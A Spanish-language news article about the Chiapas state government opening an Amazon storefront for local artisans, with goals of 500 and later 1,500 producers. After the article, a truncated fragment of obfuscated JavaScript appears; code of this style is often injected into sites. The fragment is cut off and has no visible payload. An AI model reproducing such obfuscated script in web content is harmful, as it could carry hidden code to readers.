Productos chiapanecos serán ofertados en Amazon


Manuel Jiménez.
11 de septiembre del 2025. Tuxtla Gutiérrez.- El Gobierno del Estado, a través de la Secretaría de Economía y del Trabajo, inauguró oficialmente la tienda virtual “Consume Chiapas Hecho a Mano by Amazon”, una iniciativa pionera que conectará directamente a los maestros artesanos con millones de compradores en México, Estados Unidos y otros mercados internacionales.
Este proyecto estratégico, impulsado por las instrucciones del gobernador Eduardo Ramírez Aguilar y del secretario Luis Pedrero González, marca un paso decisivo para digitalizar la economía local y combatir uno de los mayores desafíos del sector: la comercialización justa y a gran escala.
Roberto Borges Espinoza, Director de Emprendimiento e Impulso a la Competitividad, explicó en entrevista que la plataforma no es solo un canal de ventas, sino un programa integral de apoyo.
“No se trata solo de abrir una tienda en línea; se trata de preparar a nuestros artesanos para el éxito en la economía digital. Vamos a capacitarlos, formalizarlos y asegurarnos de que su talento sea valorado y remunerado como se merece”, afirmó.
La ambición del proyecto es significativa, aunque la convocatoria se acaba de abrir en coordinación con los municipios y la Casa de las Artesanías, se espera incorporar a 500 productores en una primera etapa.
La meta a largo plazo es aún más audaz: que para el final del sexenio, 1,500 artesanos estén vendiendo activamente desde sus comunidades al mundo.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Diputado reprueba detención del presidente Nicolás Maduro

Manuel Jiménez. 5 de enero del 2026. El diputado Mario Guillén Guillén, titular de la …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *